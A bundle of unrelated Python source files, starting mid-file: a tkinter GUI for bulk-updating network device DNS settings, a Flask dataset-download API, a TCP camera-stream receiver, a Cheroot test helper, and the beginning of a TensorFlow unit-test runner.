font=('Roboto', 18), bg='#3a995b',
fg='red')
def validate_api_key(self, api_key: str, controller):
"""
        This checks whether the API key is valid by using the automation class method 'set_working_api_key'.
        If the key is invalid, it packs the invalid_api_key label, which shows an error message.
        If the key is valid, it initializes the 'automation' variable with the API key
        and also initializes the combobox for the Organization Page.
        It then switches to the Organization Page.
:param api_key: str
:param controller:
:return:
"""
# Checks if the provided API key is correct & sets it
if controller.automation.set_working_api_key(api_key=api_key):
# If the error message for wrong API key is up, cleans it
if self.invalid_api_key.winfo_ismapped():
self.invalid_api_key.pack_forget()
# Sets the combobox for the next page
page = self.controller.get_page('OrganizationPage')
page.init_combo_box_after_valid_api_key()
# Switch to the Organization page
controller.show_frame("OrganizationPage")
# If the API key is incorrect
else:
# Displays the API key error message if not already displayed
if not self.invalid_api_key.winfo_ismapped():
self.invalid_api_key.pack()
class OrganizationPage(tk.Frame):
"""
    This page asks you which Organization you want to work with.
"""
# ComboBox containing the different organizations user has access to
# It will be initialized in the 'init_combo_box_after_valid_api_key' function
combobox = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting my_tkinter_interface controller
self.controller = controller
# Organization page
self.label_title = tk.Label(self, text='Organization choice', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the Organization
self.label_instruction = tk.Label(self, text='Please choose your working Organization :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# validate organization button
self.validate_organization_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white',
fg='#3a995b',
command=lambda: self.validate_organization(self.combobox.get()))
self.validate_organization_button.pack(pady=10)
def init_combo_box_after_valid_api_key(self):
"""
Initializes the comboBox containing the user accessible organizations
:return:
"""
self.combobox = ttk.Combobox(self, values=self.controller.automation.get_available_organizations_names_list(),
width=40)
# Display first element of the list
self.combobox.current(0)
self.combobox.pack()
def validate_organization(self, organization_name):
"""
        Sets the working organization and then switches to the Network Page
:param organization_name:
:return:
"""
# Sets the working organization with the organization name
self.controller.automation.set_working_organization(organization_name=organization_name)
# Initializes the Network page ComboBox variable
page = self.controller.get_page('NetworkPage')
page.init_combo_box_after_valid_organization()
# Shows the Network Page
self.controller.show_frame("NetworkPage")
class NetworkPage(tk.Frame):
"""
    This page asks you which network you want to work with.
"""
# ComboBox containing the different organizations user has access to
# It will be initialized in the 'init_combo_box_after_valid_organization' function
combobox = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting the frame controller
self.controller = controller
# Network page
self.label_title = tk.Label(self, text='Network choice', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the Network
self.label_instruction = tk.Label(self, text='Please choose your working Network :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# validate network button
self.validate_network_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white', fg='#3a995b',
command=lambda: self.validate_network(self.combobox.get()))
self.validate_network_button.pack(pady=10)
def init_combo_box_after_valid_organization(self):
"""
Initializes the comboBox containing the user accessible networks
:return:
"""
self.combobox = ttk.Combobox(self, values=self.controller.automation.get_available_networks_names_list(),
width=40)
# Display first element of the list
self.combobox.current(0)
self.combobox.pack()
def validate_network(self, network_name):
"""
        Sets the working network and then switches to the DNS Page
:param network_name:
:return:
"""
# Sets the working network with the network name
self.controller.automation.set_working_network(network_name=network_name)
# Shows the Template Page
self.controller.show_frame("DnsPage")
class DnsPage(tk.Frame):
"""
    This page lets you enter two DNS IPs and updates the static DNS configuration of every device in the network.
"""
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting the frame controller
self.controller = controller
# DNS page
self.label_title = tk.Label(self, text='DNS modification', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the DNS configuration
self.label_instruction = tk.Label(self, text='Please input two DNS IP :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# DNS 1 label
dns_one_label = Label(self, text='DNS 1 :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
dns_one_label.pack()
# DNS 1 input
dns_one_input = Entry(self, font=("Helvetica", 12))
dns_one_input.pack()
# DNS 2 label
dns_two_label = Label(self, text='DNS 2 :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
dns_two_label.pack()
# DNS 2
dns_two_input = Entry(self, font=("Helvetica", 12))
dns_two_input.pack()
# Validate DNS button
        # The button's command runs in a separate thread so the frame doesn't freeze while the automation runs
self.validate_dns_button = tk.Button(self, text="Validate DNS and launch automation",
font=("Helvetica", 12),
bg='white',
fg='#3a995b',
                                             command=lambda: threading.Thread(
                                                 target=self.validate_dns,
                                                 kwargs={'dns_one_ip': dns_one_input.get(),
                                                         'dns_two_ip': dns_two_input.get()}).start()
                                             )
self.validate_dns_button.pack(pady=10)
# Error message if DNS 1 isn't valid
self.dns_one_invalid = tk.Label(self, text='First DNS is not valid, please correct it',
font=('Roboto', 14), bg='#3a995b',
fg='red')
# Error message if DNS 2 isn't valid
self.dns_two_invalid = tk.Label(self, text='Second DNS is not valid, please correct it',
font=('Roboto', 14), bg='#3a995b',
fg='red')
# Validation message when both DNS are ok
self.dns_both_valid = tk.Label(self, text='Both DNS are valid, automation started !',
font=('Roboto', 14), bg='#3a995b',
fg='white')
# Work in progress label
self.label_work_in_progress = tk.Label(self, text='Work in progress...',
font=('Roboto', 14),
bg='#3a995b', fg='white')
# Done label
self.label_done = tk.Label(self, text='Done ! Automation complete',
font=('Roboto', 20),
bg='#3a995b', fg='white')
def validate_dns(self, dns_one_ip, dns_two_ip):
"""
        Checks whether the DNS IPs provided by the user are valid and then launches the automation.
:param dns_one_ip:
:param dns_two_ip:
:return:
"""
# Clears previous messages
self.dns_one_invalid.pack_forget()
self.dns_two_invalid.pack_forget()
self.dns_both_valid.pack_forget()
self.label_work_in_progress.pack_forget()
self.label_done.pack_forget()
# Checks if DNS IP are correct
dns_one_valid = automation.automation_core.check_ip_validity(ip=dns_one_ip)
dns_two_valid = automation.automation_core.check_ip_validity(ip=dns_two_ip)
# If both DNS are OK
if dns_one_valid and dns_two_valid:
# Displays the validation message of both DNS
self.dns_both_valid.pack()
# Displays Work in progress label
self.label_work_in_progress.pack()
# Starts the automation
self.controller.automation.update_network_static_devices_dns(dns_list=[dns_one_ip, dns_two_ip])
# Displays the done message
self.label_done.pack()
# If DNS 1 is invalid
elif not dns_one_valid:
# Displays the DNS 1 error message
self.dns_one_invalid.pack()
# If DNS 2 is also invalid
if not dns_two_valid:
# Displays the DNS 2 error message
self.dns_two_invalid.pack()
# If only DNS 2 is invalid
elif not dns_two_valid:
# Displays the DNS 2 error message
self.dns_two_invalid.pack()
|
app.py
|
#!/usr/bin/env python3
import json
import os
import pickle
import sys
import re
import uuid
from psutil import Process as ProcessManager
from psutil import NoSuchProcess
from flask import Flask, make_response, Response, jsonify, request, send_file, send_from_directory
from data_access.Dataset import GeneyDataset
from multiprocessing import Process
from data_access import GeneyJob
import smtplib
from private import EMAIL_PASS, EMAIL_USER
from email.message import EmailMessage
DATA_PATH = os.getenv('GENEY_DATA_PATH', '')
if not DATA_PATH:
print('"GENEY_DATA_PATH" environment variable not set!', flush=True)
sys.exit(1)
URL = os.getenv('GENEY_URL', '')
if not URL:
print('"GENEY_URL" environment variable not set!', flush=True)
sys.exit(1)
DOWNLOAD_LOCATION = os.getenv('DOWNLOAD_LOCATION', '')
if not DOWNLOAD_LOCATION:
print('"DOWNLOAD_LOCATION" environment variable not set!', flush=True)
sys.exit(1)
else:
DOWNLOAD_HISTORY = os.path.join(DOWNLOAD_LOCATION, 'download_history.pkl')
with open(DOWNLOAD_HISTORY, 'wb') as fp:
pickle.dump({}, fp)
MIME_TYPES = {
'csv': 'text/csv',
'json': 'application/json',
'tsv': 'text/tsv',
'gz': 'application/gzip',
'html': 'text/html',
'xlsx': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'pq': 'application/parquet',
'feather': 'application/feather',
'pkl': 'application/pickle',
'msgpack': 'application/msgpack',
'dta': 'application/stata',
'arff': 'application/arff',
'sql': 'application/sqlite',
'h5': 'application/hdf5',
'gzip': 'application/gzip',
}
# dictionary of commands and their respective handlers
# each command function registers itself in this dictionary after it is defined
COMMANDS = {}
# cache of datasets so we don't have to go to redis every time we need a dataset
# if you make a change to a dataset and want it to reload, you'll need to restart the server
# we do not assume this is a comprehensive list of all datasets; for that we rely on redis
DATASETS = {}
DESCRIPTIONS = None
DATASETS_LOADED: bool = False
app = Flask(__name__)
def load_datasets() -> None:
global DATASETS_LOADED
global DESCRIPTIONS
DESCRIPTIONS = {}
for directory in os.listdir(DATA_PATH):
if os.path.isdir(os.path.join(DATA_PATH, directory)):
try:
dataset = GeneyDataset(os.path.join(DATA_PATH, directory))
DATASETS[dataset.dataset_id] = dataset
DESCRIPTIONS[dataset.dataset_id] = dataset.description
# redis_con.set('dataset_' + directory, pickle.dumps(dataset))
except Exception as e:
sys.stderr.write(str(e))
sys.stderr.write('UNABLE TO LOAD DATASET "{}"'.format(directory))
DATASETS_LOADED = True
def get_dataset(dataset_id: str) -> GeneyDataset:
try:
if not DATASETS_LOADED:
load_datasets()
return get_dataset(dataset_id)
if dataset_id in DATASETS:
return DATASETS[dataset_id]
else:
return None
except Exception:
return None
@app.route('/api', strict_slashes=False, methods=['POST'])
def geney_command():
# TODO: add authorization to commands
params = request.get_json()
if 'command' not in params:
return bad_request()
command = params['command']
if command not in COMMANDS:
return bad_request()
return COMMANDS[command](params)
@app.route('/api/datasets', strict_slashes=False, methods=['GET'])
def get_datasets():
if not DATASETS_LOADED:
load_datasets()
if DESCRIPTIONS is not None:
return Response(json.dumps(DESCRIPTIONS), mimetype='application/json')
else:
return not_found()
@app.route('/api/datasets/<string:dataset_id>/groups', strict_slashes=False)
def get_groups(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
return jsonify(dataset.get_groups())
@app.route('/api/datasets/<string:dataset_id>/groups/<string:group_name>/search', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/groups/<string:group_name>/search/<string:search_str>',
strict_slashes=False)
def search_group(dataset_id, group_name, search_str=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
return jsonify(dataset.search_group(group_name, search_str))
@app.route('/api/datasets/<string:dataset_id>/options', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>', strict_slashes=False)
def get_options(dataset_id, variable_name=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
if variable_name:
results = dataset.get_variable(variable_name)
return jsonify(results)
else:
return send_file(dataset.options_path)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>/search', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>/search/<string:search_str>',
strict_slashes=False)
def search_options(dataset_id, variable_name, search_str=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
else:
return jsonify(dataset.search_options(variable_name, search_str))
@app.route('/api/datasets/<string:dataset_id>/samples', strict_slashes=False, methods=['POST'])
def count_samples(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
count = dataset.get_num_samples_matching_filters(request.data)
if count is None:
return bad_request()
return jsonify(count)
@app.route('/api/datasets/<string:dataset_id>/num_points', strict_slashes=False, methods=['POST'])
def num_points(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
params = request.get_json()
groups = params['groups']
features = params['features']
samples = params['num_samples']
return jsonify({'num_data_points': dataset.get_num_data_points(samples, groups, features)})
@app.route('/api/data/status/<string:path>', strict_slashes=False, methods=['GET'])
def download(path):
file_type = path.split('.')[-1]
if file_type == 'gz':
file_type = path.split('.')[-2]
path = os.path.join(DOWNLOAD_LOCATION, path)
if os.path.exists(path):
return jsonify({'url': '/api/data/download/{}'.format(path.split('/')[-1])})
else:
return jsonify({'status': 'incomplete'})
@app.route('/api/data/download/<string:path>', strict_slashes=False, methods=['GET'])
def get(path):
file_type = path.split('.')[-1]
if file_type == 'gz':
file_type = path.split('.')[-2]
mime_type = MIME_TYPES[file_type]
extension = re.search(r'\..*', path).group(0)
full_path = os.path.join(DOWNLOAD_LOCATION, path)
if os.path.exists(full_path):
# return send_file(full_path, mimetype=mime_type, as_attachment=True,
# attachment_filename="{}{}".format(path.split('-')[0], extension))
return send_from_directory(DOWNLOAD_LOCATION, path, mimetype=mime_type, as_attachment=True,
attachment_filename="{}{}".format(path.split('-')[0], extension))
else:
return not_found()
@app.route('/api/data/cancel/<string:path>', strict_slashes=False, methods=['GET'])
def cancel_download(path):
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
    else:
        print('Problem managing processes...')
        download_history = {}
if path in download_history.keys():
pid = download_history[path].pid
try:
p = ProcessManager(pid)
if p.is_running():
p.kill()
except NoSuchProcess as e:
print(e)
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, '{}incomplete'.format(path))):
os.remove(os.path.join(DOWNLOAD_LOCATION, '{}incomplete'.format(path)))
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, path)):
os.remove(os.path.join(DOWNLOAD_LOCATION, path))
return jsonify({'status': 'success'})
@app.route('/api/data/notify/<string:path>', strict_slashes=False, methods=['POST'])
def notify(path):
email = request.form.get('email')
name = request.form.get('name')
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
if path not in download_history.keys():
return not_found('No job found')
else:
download_history[path].email = email
download_history[path].name = name
with open(DOWNLOAD_HISTORY, 'wb') as fp:
pickle.dump(download_history, fp)
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, path)):
send_email(path, email, name)
return jsonify({'status': 'success'})
@app.route('/api/datasets/<string:dataset_id>/query/', strict_slashes=False, methods=['POST'])
def query(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
try:
query = request.form.get('query')
options = json.loads(request.form.get('options'))
except Exception:
return bad_request()
if 'fileformat' not in options:
return bad_request()
file_format = options['fileformat']
gzip_output = options['gzip'] if ('gzip' in options) else False
if gzip_output:
mime_type = MIME_TYPES['gzip']
else:
mime_type = MIME_TYPES[file_format]
# TODO: Validate query before starting response
filename = '{}-{}'.format(dataset_id, uuid.uuid4().hex[:8])
    extension_by_format = {
        'csv': '.csv', 'json': '.json', 'pickle': '.pkl', 'tsv': '.tsv',
        'hdf5': '.h5', 'arff': '.arff', 'excel': '.xlsx', 'feather': '.feather',
        'msgpack': '.msgpack', 'parquet': '.pq', 'stata': '.dta',
        'sqlite': '.sql', 'html': '.html',
    }
    filename += extension_by_format.get(file_format, '.csv')
if gzip_output:
filename += '.gz'
p = Process(target=create_dataset, args=(dataset, query, file_format, gzip_output, DOWNLOAD_LOCATION, filename))
p.start()
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
else:
download_history = {}
with open(DOWNLOAD_HISTORY, 'wb') as fp:
download_history[filename] = GeneyJob(p.pid, filename)
pickle.dump(download_history, fp)
return jsonify({'download_path': filename})
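# Typical client flow against the endpoints above (hedged sketch; host and ids are placeholders):
#   1. POST /api/datasets/<dataset_id>/query  with form fields 'query' and 'options'
#      -> returns {"download_path": "<dataset_id>-<hex>.<ext>"}
#   2. GET  /api/data/status/<download_path>  until it returns {"url": "/api/data/download/..."}
#   3. GET  /api/data/download/<download_path>  to fetch the generated file.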
def not_found(error='not found'):
return make_response(jsonify({'error': error}), 404)
def bad_request(error='bad request'):
return make_response(jsonify({'error': error}), 400)
def reload_datasets(params=None):  # accepts the params dict passed by the generic COMMANDS dispatch
global DATASETS_LOADED
try:
DATASETS_LOADED = False
load_datasets()
return make_response('success', 200)
except Exception:
return make_response('error', 500)
def create_dataset(dataset: GeneyDataset, query, file_format, gzip_output, download_location, filename):
dataset.query(query, file_format, gzip_output, download_location, filename)
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
if filename in download_history.keys():
if download_history[filename].email is not None:
send_email(filename, download_history[filename].email, download_history[filename].name)
else:
print('problem with history')
def send_email(path, email, name):
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login(EMAIL_USER, EMAIL_PASS)
subject = 'Geney Data Complete'
path = '{}/api/data/download/{}'.format(URL, path)
message = EmailMessage()
message['From'] = 'Geney'
message['To'] = email
message['Subject'] = subject
message.set_content('{},\nThank you for your patience! Here is your data: {}'.format(name, path))
s.send_message(message)
COMMANDS['reload'] = reload_datasets
app.register_error_handler(404, not_found)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=8889)
|
sensor_receiver_ros.py
|
import sys
import argparse
import socket
import struct
from collections import namedtuple
import cv2
import numpy as np
import multiprocessing
# Each port corresponds to a single stream type
STREAM_PORTS = {
"color": 10080,
"depth": 10081
}
SENSOR_STREAM_HEADER_FORMAT = "@qIIIIffffffffffffffffffff"
SENSOR_FRAME_STREAM_HEADER = namedtuple(
'SensorFrameStreamHeader',
[ 'Timestamp', 'ImageWidth', 'ImageHeight', 'PixelStride', 'BytesLength',
'FocalLengthX','FocalLengthY','PrincipalPointX','PrincipalPointY',
'CameraPoseM11', 'CameraPoseM12', 'CameraPoseM13', 'CameraPoseM14',
'CameraPoseM21', 'CameraPoseM22', 'CameraPoseM23', 'CameraPoseM24',
'CameraPoseM31', 'CameraPoseM32', 'CameraPoseM33', 'CameraPoseM34',
'CameraPoseM41', 'CameraPoseM42', 'CameraPoseM43', 'CameraPoseM44']
)
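# A minimal sketch (defined but never called here): shows how a header laid out with
# SENSOR_STREAM_HEADER_FORMAT would be packed and parsed back into the namedtuple.
# All numeric values below are made up for illustration; real headers arrive on the socket.
def _example_header_roundtrip():
    pose_identity = tuple(float(v) for v in np.eye(4).flatten())  # 16 floats, row-major 4x4 pose
    values = (123456789,                    # Timestamp (q)
              640, 480, 2,                  # ImageWidth, ImageHeight, PixelStride (I)
              640 * 480 * 2,                # BytesLength (I)
              525.0, 525.0, 319.5, 239.5    # intrinsics fx, fy, cx, cy (f)
              ) + pose_identity             # CameraPoseM11..M44 (f)
    raw = struct.pack(SENSOR_STREAM_HEADER_FORMAT, *values)
    return SENSOR_FRAME_STREAM_HEADER(*struct.unpack(SENSOR_STREAM_HEADER_FORMAT, raw))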
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--host",
help="Host address to connect", default="192.168.50.202")
parser.add_argument("--type",
help="sensor type", default="color")
args = parser.parse_args()
return args
def create_socket():
# Create a TCP Stream socket
try:
ss = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
return ss
except socket.error as msg:
print("=> [ERROR] Failed to create socket!!!")
print(" *" + msg)
sys.exit()
def main(host, sensor_type):
"""Receiver main"""
port = STREAM_PORTS[sensor_type]
timeout_counter = 0
socket.setdefaulttimeout(3)
try:
while True:
ss = create_socket()
try:
ss.connect((host, port))
print("=> [INFO] Connection success... ({}:{})".format(host, port))
pass
except Exception:
ss.close()
timeout_counter +=1
print('=> [ERROR]: Connection failed ({})!!! ({}:{})'.format(timeout_counter,host, port))
print(" *Try to reconnect 3 seconds later")
continue
while True:
# Receive the header
try:
header_data = ss.recv(struct.calcsize(SENSOR_STREAM_HEADER_FORMAT))
except Exception:
ss.close()
break
header_data = struct.unpack(SENSOR_STREAM_HEADER_FORMAT, header_data)
header = SENSOR_FRAME_STREAM_HEADER(*header_data)
print(header)
# Read the image in chunks
image_data = b""
while len(image_data) < header.BytesLength:
remaining_bytes = header.BytesLength - len(image_data)
image_data_chunk = ss.recv(remaining_bytes)
if not image_data_chunk:
print('=> [ERROR]: Failed to receive image data')
break
# sys.exit()
image_data += image_data_chunk
if len(image_data) != header.BytesLength:
break
# Depth image
if header.PixelStride==2:
image_array = np.frombuffer(image_data, dtype=np.uint16).copy()
image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
image_array = cv2.applyColorMap(cv2.convertScaleAbs(image_array, alpha=0.03), cv2.COLORMAP_JET)
                # Color image BGRA8
                elif header.PixelStride == 4:
                    image_array = np.frombuffer(image_data, dtype=np.uint8).copy()
                    image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
                # Color image BGR8
                elif header.PixelStride == 3:
                    image_array = np.frombuffer(image_data, dtype=np.uint8).copy()
                    image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
                else:
                    print('=> [ERROR]: Unsupported pixel stride: {}'.format(header.PixelStride))
                    continue
# Display image
cv2.imshow('Stream Preview', image_array)
if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
ss.close()
print('=> [INFO]: Socket close success')
sys.exit()
except KeyboardInterrupt:
cv2.destroyAllWindows()
ss.close()
print('=> [INFO]: Socket close success')
if __name__ == "__main__":
args = parse_args()
host = args.host
sensor_type = args.type.lower()
if sensor_type == "all":
p1 = multiprocessing.Process(target=main,args=(host, "color",),name="ColorSensor")
p2 = multiprocessing.Process(target=main,args=(host, "depth",),name="DepthSensor")
p1.start()
p2.start()
p1.join()
p2.join()
else:
main(host=host, sensor_type=sensor_type)
|
helper.py
|
"""A library of helper functions for the Cheroot test suite."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import datetime
import logging
import os
import sys
import time
import threading
import types
from six.moves import http_client
import six
import cheroot.server
import cheroot.wsgi
from cheroot.test import webtest
log = logging.getLogger(__name__)
thisdir = os.path.abspath(os.path.dirname(__file__))
config = {
'bind_addr': ('127.0.0.1', 54583),
'server': 'wsgi',
'wsgi_app': None,
}
class CherootWebCase(webtest.WebCase):
"""Helper class for a web app test suite."""
script_name = ''
scheme = 'http'
available_servers = {
'wsgi': cheroot.wsgi.Server,
'native': cheroot.server.HTTPServer,
}
@classmethod
def setup_class(cls):
"""Create and run one HTTP server per class."""
conf = config.copy()
conf.update(getattr(cls, 'config', {}))
s_class = conf.pop('server', 'wsgi')
server_factory = cls.available_servers.get(s_class)
if server_factory is None:
            raise RuntimeError('Unknown server in config: %s' % s_class)
cls.httpserver = server_factory(**conf)
cls.HOST, cls.PORT = cls.httpserver.bind_addr
if cls.httpserver.ssl_adapter is None:
ssl = ''
cls.scheme = 'http'
else:
ssl = ' (ssl)'
cls.HTTP_CONN = http_client.HTTPSConnection
cls.scheme = 'https'
v = sys.version.split()[0]
log.info('Python version used to run this test script: %s' % v)
log.info('Cheroot version: %s' % cheroot.__version__)
log.info('HTTP server version: %s%s' % (cls.httpserver.protocol, ssl))
log.info('PID: %s' % os.getpid())
if hasattr(cls, 'setup_server'):
# Clear the wsgi server so that
# it can be updated with the new root
cls.setup_server()
cls.start()
@classmethod
def teardown_class(cls):
"""Cleanup HTTP server."""
if hasattr(cls, 'setup_server'):
cls.stop()
@classmethod
def start(cls):
"""Load and start the HTTP server."""
threading.Thread(target=cls.httpserver.safe_start).start()
while not cls.httpserver.ready:
time.sleep(0.1)
@classmethod
def stop(cls):
"""Terminate HTTP server."""
cls.httpserver.stop()
td = getattr(cls, 'teardown', None)
if td:
td()
date_tolerance = 2
def assertEqualDates(self, dt1, dt2, seconds=None):
"""Assert ``abs(dt1 - dt2)`` is within ``Y`` seconds."""
if seconds is None:
seconds = self.date_tolerance
if dt1 > dt2:
diff = dt1 - dt2
else:
diff = dt2 - dt1
if not diff < datetime.timedelta(seconds=seconds):
raise AssertionError(
'%r and %r are not within %r seconds.' %
(dt1, dt2, seconds),
)
class Request:
"""HTTP request container."""
def __init__(self, environ):
"""Initialize HTTP request."""
self.environ = environ
class Response:
"""HTTP response container."""
def __init__(self):
"""Initialize HTTP response."""
self.status = '200 OK'
self.headers = {'Content-Type': 'text/html'}
self.body = None
def output(self):
"""Generate iterable response body object."""
if self.body is None:
return []
elif isinstance(self.body, six.text_type):
return [self.body.encode('iso-8859-1')]
elif isinstance(self.body, six.binary_type):
return [self.body]
else:
return [x.encode('iso-8859-1') for x in self.body]
class Controller:
"""WSGI app for tests."""
def __call__(self, environ, start_response):
"""WSGI request handler."""
req, resp = Request(environ), Response()
try:
# Python 3 supports unicode attribute names
# Python 2 encodes them
handler = self.handlers[environ['PATH_INFO']]
except KeyError:
resp.status = '404 Not Found'
else:
output = handler(req, resp)
if (
output is not None
and not any(
resp.status.startswith(status_code)
for status_code in ('204', '304')
)
):
resp.body = output
try:
resp.headers.setdefault('Content-Length', str(len(output)))
except TypeError:
if not isinstance(output, types.GeneratorType):
raise
start_response(resp.status, resp.headers.items())
return resp.output()
|
tf_unittest_runner.py
|
# ==============================================================================
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
# ==============================================================================
import unittest
import sys
import argparse
import os
import re
import fnmatch
import time
import warnings
from datetime import timedelta
from fnmatch import fnmatch
import multiprocessing
mpmanager = multiprocessing.Manager()
mpmanager_return_dict = mpmanager.dict()
try:
import xmlrunner
except ImportError:
os.system('pip install unittest-xml-reporting')
import xmlrunner
os.environ['OPENVINO_TF_DISABLE_DEASSIGN_CLUSTERS'] = '1'
"""
tf_unittest_runner is primarily used to run tensorflow python
unit tests using ngraph
"""
def main():
parser = argparse.ArgumentParser()
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
required.add_argument(
'--tensorflow_path',
help=
"Specify the path to Tensorflow source code. Eg:openvino_tensorflow/build_cmake/tensorflow \n",
required=True)
optional.add_argument(
'--list_tests',
help=
"Prints the list of test cases in this package. Eg:math_ops_test.* \n")
optional.add_argument(
'--list_tests_from_file',
help=
"""Reads the test names/patterns specified in a manifest file and displays a consolidated list.
Eg:--list_tests_from_file=tests_linux_cpu.txt""")
optional.add_argument(
'--run_test',
help=
"Runs the testcase(s), specified by name or pattern. Eg: math_ops_test.DivNoNanTest.testBasic or math_ops_test.*"
)
optional.add_argument(
'--run_tests_from_file',
help="""Reads the test names specified in a manifest file and runs them.
Eg:--run_tests_from_file=tests_to_run.txt""")
optional.add_argument(
'--xml_report',
help=
"Generates results in xml file for jenkins to populate in the test result \n"
)
optional.add_argument(
'--verbose',
action="store_true",
help="Prints standard out if specified \n")
optional.add_argument(
'--print_support_vector',
action="store_true",
help=
"Prints support vector from a device specific manifest file in True/False format\n"
)
optional.add_argument(
'--timeout',
type=int,
default=60,
action="store",
help="Timeout to skip a test if it hangs\n")
parser._action_groups.append(optional)
arguments = parser.parse_args()
xml_report = arguments.xml_report
if (arguments.list_tests):
test_list = get_test_list(arguments.tensorflow_path,
arguments.list_tests)
print('\n'.join(sorted(test_list[0])))
print('Total:', len(test_list[0]))
return True
if (arguments.list_tests_from_file):
test_list, skip_list = read_tests_from_manifest(
arguments.list_tests_from_file, arguments.tensorflow_path)
print('\n'.join(sorted(test_list)))
print('Total:', len(test_list), 'Skipped:', len(skip_list))
if (arguments.print_support_vector):
print("\n----------------------------------\n")
all_tests = test_list | skip_list
for test in sorted(all_tests):
if test in test_list:
print("True")
elif test in skip_list:
print("False")
return True
if (arguments.run_test):
invalid_list = []
start = time.time()
test_list = get_test_list(arguments.tensorflow_path, arguments.run_test)
for test in test_list[1]:
if test is not None:
                invalid_list.append(test)
result_str = "\033[91m INVALID \033[0m " + test + \
'\033[91m' + '\033[0m'
print('TEST:', result_str)
test_results = run_test(
sorted(test_list[0]), xml_report, (2 if arguments.verbose else 0))
elapsed = time.time() - start
print("\n\nTesting results\nTime elapsed: ",
str(timedelta(seconds=elapsed)))
return check_and_print_summary(test_results, test_list[1])
if (arguments.run_tests_from_file):
invalid_list = []
start = time.time()
list_of_tests = read_tests_from_manifest(arguments.run_tests_from_file,
arguments.tensorflow_path)[0]
test_results = run_test(
sorted(list_of_tests), xml_report, (2 if arguments.verbose else 0),
arguments.timeout)
elapsed = time.time() - start
print("\n\nTesting results\nTime elapsed: ",
str(timedelta(seconds=elapsed)))
return check_and_print_summary(test_results, invalid_list)
return True
def get_test_list(tf_path, test_regex):
accepted_formats = [
"*test*", "math_ops_test.DivNoNanTest.testBasic",
"math_ops_test.DivNoNanTest.*", "math_ops_test.D*", "math_ops_test.*",
"math_*_test", "math_*_*_test", "math*_test"
]
try:
module_list = regex_walk(tf_path, test_regex)
except Exception as e:
module_list = []
print(
"Exception occured in regex_walk (" + test_regex + ") -> " +
str(e) +
"""\nInvalid module name. Use bazel query below to get list of tensorflow python test modules.
bazel query 'kind(".*_test rule", //tensorflow/python:nn_test)' --output label\n"""
)
try:
test_list = list_tests(module_list, test_regex)
except Exception as e:
test_list = [[], []]
print(
"Exception occured in list_tests. " + str(e) +
"\nEnter a valid argument to --list_tests or --run_test.\n \nLIST OF ACCEPTED FORMATS:"
)
print('\n'.join(accepted_formats))
return test_list
def regex_walk(dirname, regex_input):
"""
Adds all the directories under the specified dirname to the system path to
be able to import the modules.
Args:
dirname: This is the tensorflow_path passed as an argument is the path to
tensorflow source code.
regex_input: Regular expression input string to filter and list/run tests.
Few examples of accepted regex_input are:
math_ops_test.DivNoNanTest.testBasic
math_ops_test.DivNoNanTest.*
math_ops_test.D*
math_ops_test.*
math_*_test
math_*_*_test
math*_test
"""
if (re.search(r'\.', regex_input) is None):
# a module name regex was given
test = regex_input + '.py'
else:
# regex has dot(s) e.g. module.class.testfunc
        test = (re.split(r"\.", regex_input))[0] + '.py'
module_list = []
for path, subdirs, files in os.walk(dirname):
for name in files:
if fnmatch(name, test):
if path not in sys.path:
sys.path.append(os.path.abspath(path))
name = os.path.splitext(name)[0]
module_list.append(name)
if not module_list:
print("Test pattern/name does not exist:", regex_input, "dirname",
dirname)
return module_list
def list_tests(module_list, regex_input):
"""
